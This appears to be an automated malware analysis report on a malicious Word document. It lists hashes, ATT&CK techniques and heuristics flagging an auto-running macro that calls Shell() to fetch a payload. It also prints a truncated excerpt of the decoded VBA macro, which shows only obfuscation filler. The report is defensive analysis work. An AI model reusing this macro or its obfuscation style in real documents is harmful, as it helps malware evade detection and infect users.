Office (OLE) malware analysis — malicious · c6bf1da8d7ccb15c

MALICIOUS

Office (OLE)

170.8 KB Created: 2018-07-24 17:43:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: c2095c670e42f6f13b319ab79054bfb6 SHA-1: 773128e65fb3177ff43c48d71dd2e2b7b85382aa SHA-256: c6bf1da8d7ccb15cc7cab013ab5ca68d48516ce4590f07e5aed00606d4c89cad

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an Office document with VBA macros. The 'Document_Open' macro is configured to execute a shell command, indicating it's designed to download and run a secondary payload. The VBA code itself is heavily obfuscated, making it difficult to determine the exact nature of the payload or its destination.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32942 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32942 bytes
SHA-256: `900b5003dfdcced58d0855e160e6f7fdad802acba724b371d6d52a6eb4da0d3f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aTTvjKo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function EvuWAHzJozJAtG() On Error Resume Next If AiEndd >= 11 Then Set XQPPz = oTnIO jNHLY = OnjwwT - 321438563 Else dalRS = fwGnii * CcVvN - XYfjs / foOql + (SwCVh + BUNjT) End If If YErnAj >= 11 Then Set fDNaS = lWRvWz vTKhsW = iBUKho - 321438563 Else ZTtAu = saLGC * rRFpQ - JCjFtK / ikkdjD + (dWMDYu + noVIDi) End If If clsAs >= 11 Then Set bioRTJ = jiQhJi HzLuT = zhfvB - 321438563 Else RBGjhw = ETPhj * piHTsS - baLiaw / UBtwsP + (sdazjj + ZsrPc) End If If iBIGGn >= 11 Then Set lVruw = tfanXK WtdcHi = Vqfio - 321438563 Else iPqHju = jRmtA * iKhpzL - fQoYj / XkoupM + (PUdpT + cHLFG) End If If djHwl >= 11 Then Set kltvo = rsumHQ UOLiP = vRusro - 321438563 Else CJPqY = dXAnYA * XpLGi - TNIKR / sQpAqs + (Hkvhc + NQniT) End If If sqOncR >= 11 Then Set qqcGiQ = CaQoTv BjVJjh = iTOzs - 321438563 Else cLfLQ = tCmwrA * SWSaa - LhrJs / tjwIXN + (qNIru + YUBuO) End If If IRPjQs >= 11 Then Set ojVlBm = WOwtPk KFJiXV = oJncb - 321438563 Else VcUQs = aTJrXq * YBFFA - zvwLFB / XlAWiI + (YLuujB + KPANmo) End If End Function Private Function vwwUAHXSisrDqT() On Error Resume Next If FShWW >= 11 Then Set Dzqsmw = mVHVD FrUIJQ = KWzuNW - 321438563 Else YwTfnJ = Jwvda * QBENj - MTjkJ / FiZjz + (iQOApB + hulvtZ) End If If uWDDN >= 11 Then Set WSBdW = zWINO HQJFwl = iDvin - 321438563 Else uNTilj = jncjT * kAUHk - oKMTJo / StjDb + (NDcJin + hszTo) End If If WaCijK >= 11 Then Set rAXtZ = EhSWK FApCzV = dHBNn - 321438563 Else dowzvi = tiWdT * XXTtT - itJcjY / IIjCp + (kRvfGh + snrad) End If If jMRBA >= 11 Then Set FrlzO = BUBNZA HDbLA = BvEKJ - 321438563 Else WSAMB = IfRlNQ * FwPsMX - SjnDIA / kwWAh + (jsSBHz + QVFVqK) End If If jwAJOi >= 11 Then Set EhUMR = sVOMch jBbsNL = DvBizU - 321438563 Else WJHWoH = fjaSo * iWYfw - VziXIw / mNJjm + (zlVMH + nZVERA) End If If HYIRmL >= 11 Then Set JPsMKH = bddwzw uPMDl = TaYnK - 321438563 Else owJQPN = fGzIcr * ATISv - jZNIw / AKfjr + (BfTjR + NkQSD) End If If ZAIKvL >= 11 Then Set zPiuK = LOczkB GTIrqU = wwLtf - 321438563 Else DzRlYI = iNouO * tLSPB - nffGsR / azIDD + (OiqMwr + blSsi) End If End Function Private Function mDsmTvpiw() On Error Resume Next If SYjul >= 11 Then Set pzNfOl = tZzaR wYWSL = IvInC - 321438563 Else EEwLso = kKVdh * YRistz - NjFcw / Ubckj + (KrKhO + hJPjDc) End If If RzSIDo >= 11 Then Set qoHJk = OTiXzL KhCXO = QjSGzO - 321438563 Else zlCVkl = hSYiwZ * IcQGZ - Qijwuu / XZXhI + (tocRNm + cYsJY) End If If iIDBAa >= 11 Then Set bRBGb = RLIuqW jPfLD = LOrqa - 321438563 Else VFqOV = hhYRX * KlwzRP - SBVIOd / wjPIjb + (hFkawm + JpiOs) End If If fnBdCO >= 11 Then Set naVwVP = TjIaoR vOkPK = ozjfc - 321438563 Else HZhawh = VXRpi * SupjYc - cRkZQN / DBotpW + (INmIJt + wzdZC) End If End Function Private Function XOwbsIWzz() On Error Resume Next If uuwFq >= 11 Then Set RSqBD = MIUiG KvCiP = rojuu - 321438563 Else CnmhAH = kzXBoX * mSjVT - iXzzH / ffOBi + (XCwPb + INIWKn) End If If iXASQh >= 11 Then Set AdfMWV = aJMruV qjJBL = iSKGn - 321438563 Else KIzIXO = wDXlKr * wSzKIC - NnrrQ / ZMiSZ + (WKUaB + dNZUSu) End If If aOmLhq >= 11 Then Set HNiTzl = tnHtQ BFLjd = BrazR - 321438 ... (truncated)

SHA-256: 900b5003dfdcced58d0855e160e6f7fdad802acba724b371d6d52a6eb4da0d3f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "aTTvjKo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function EvuWAHzJozJAtG()
On Error Resume Next
   If AiEndd >= 11 Then
      Set XQPPz = oTnIO
      jNHLY = OnjwwT - 321438563
      Else
      dalRS = fwGnii * CcVvN - XYfjs / foOql + (SwCVh + BUNjT)
   End If
   If YErnAj >= 11 Then
      Set fDNaS = lWRvWz
      vTKhsW = iBUKho - 321438563
      Else
      ZTtAu = saLGC * rRFpQ - JCjFtK / ikkdjD + (dWMDYu + noVIDi)
   End If
   If clsAs >= 11 Then
      Set bioRTJ = jiQhJi
      HzLuT = zhfvB - 321438563
      Else
      RBGjhw = ETPhj * piHTsS - baLiaw / UBtwsP + (sdazjj + ZsrPc)
   End If
   If iBIGGn >= 11 Then
      Set lVruw = tfanXK
      WtdcHi = Vqfio - 321438563
      Else
      iPqHju = jRmtA * iKhpzL - fQoYj / XkoupM + (PUdpT + cHLFG)
   End If
   If djHwl >= 11 Then
      Set kltvo = rsumHQ
      UOLiP = vRusro - 321438563
      Else
      CJPqY = dXAnYA * XpLGi - TNIKR / sQpAqs + (Hkvhc + NQniT)
   End If
   If sqOncR >= 11 Then
      Set qqcGiQ = CaQoTv
      BjVJjh = iTOzs - 321438563
      Else
      cLfLQ = tCmwrA * SWSaa - LhrJs / tjwIXN + (qNIru + YUBuO)
   End If
   If IRPjQs >= 11 Then
      Set ojVlBm = WOwtPk
      KFJiXV = oJncb - 321438563
      Else
      VcUQs = aTJrXq * YBFFA - zvwLFB / XlAWiI + (YLuujB + KPANmo)
   End If
End Function
Private Function vwwUAHXSisrDqT()
On Error Resume Next
   If FShWW >= 11 Then
      Set Dzqsmw = mVHVD
      FrUIJQ = KWzuNW - 321438563
      Else
      YwTfnJ = Jwvda * QBENj - MTjkJ / FiZjz + (iQOApB + hulvtZ)
   End If
   If uWDDN >= 11 Then
      Set WSBdW = zWINO
      HQJFwl = iDvin - 321438563
      Else
      uNTilj = jncjT * kAUHk - oKMTJo / StjDb + (NDcJin + hszTo)
   End If
   If WaCijK >= 11 Then
      Set rAXtZ = EhSWK
      FApCzV = dHBNn - 321438563
      Else
      dowzvi = tiWdT * XXTtT - itJcjY / IIjCp + (kRvfGh + snrad)
   End If
   If jMRBA >= 11 Then
      Set FrlzO = BUBNZA
      HDbLA = BvEKJ - 321438563
      Else
      WSAMB = IfRlNQ * FwPsMX - SjnDIA / kwWAh + (jsSBHz + QVFVqK)
   End If
   If jwAJOi >= 11 Then
      Set EhUMR = sVOMch
      jBbsNL = DvBizU - 321438563
      Else
      WJHWoH = fjaSo * iWYfw - VziXIw / mNJjm + (zlVMH + nZVERA)
   End If
   If HYIRmL >= 11 Then
      Set JPsMKH = bddwzw
      uPMDl = TaYnK - 321438563
      Else
      owJQPN = fGzIcr * ATISv - jZNIw / AKfjr + (BfTjR + NkQSD)
   End If
   If ZAIKvL >= 11 Then
      Set zPiuK = LOczkB
      GTIrqU = wwLtf - 321438563
      Else
      DzRlYI = iNouO * tLSPB - nffGsR / azIDD + (OiqMwr + blSsi)
   End If
End Function
Private Function mDsmTvpiw()
On Error Resume Next
   If SYjul >= 11 Then
      Set pzNfOl = tZzaR
      wYWSL = IvInC - 321438563
      Else
      EEwLso = kKVdh * YRistz - NjFcw / Ubckj + (KrKhO + hJPjDc)
   End If
   If RzSIDo >= 11 Then
      Set qoHJk = OTiXzL
      KhCXO = QjSGzO - 321438563
      Else
      zlCVkl = hSYiwZ * IcQGZ - Qijwuu / XZXhI + (tocRNm + cYsJY)
   End If
   If iIDBAa >= 11 Then
      Set bRBGb = RLIuqW
      jPfLD = LOrqa - 321438563
      Else
      VFqOV = hhYRX * KlwzRP - SBVIOd / wjPIjb + (hFkawm + JpiOs)
   End If
   If fnBdCO >= 11 Then
      Set naVwVP = TjIaoR
      vOkPK = ozjfc - 321438563
      Else
      HZhawh = VXRpi * SupjYc - cRkZQN / DBotpW + (INmIJt + wzdZC)
   End If
End Function
Private Function XOwbsIWzz()
On Error Resume Next
   If uuwFq >= 11 Then
      Set RSqBD = MIUiG
      KvCiP = rojuu - 321438563
      Else
      CnmhAH = kzXBoX * mSjVT - iXzzH / ffOBi + (XCwPb + INIWKn)
   End If
   If iXASQh >= 11 Then
      Set AdfMWV = aJMruV
      qjJBL = iSKGn - 321438563
      Else
      KIzIXO = wDXlKr * wSzKIC - NnrrQ / ZMiSZ + (WKUaB + dNZUSu)
   End If
   If aOmLhq >= 11 Then
      Set HNiTzl = tnHtQ
      BFLjd = BrazR - 321438
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.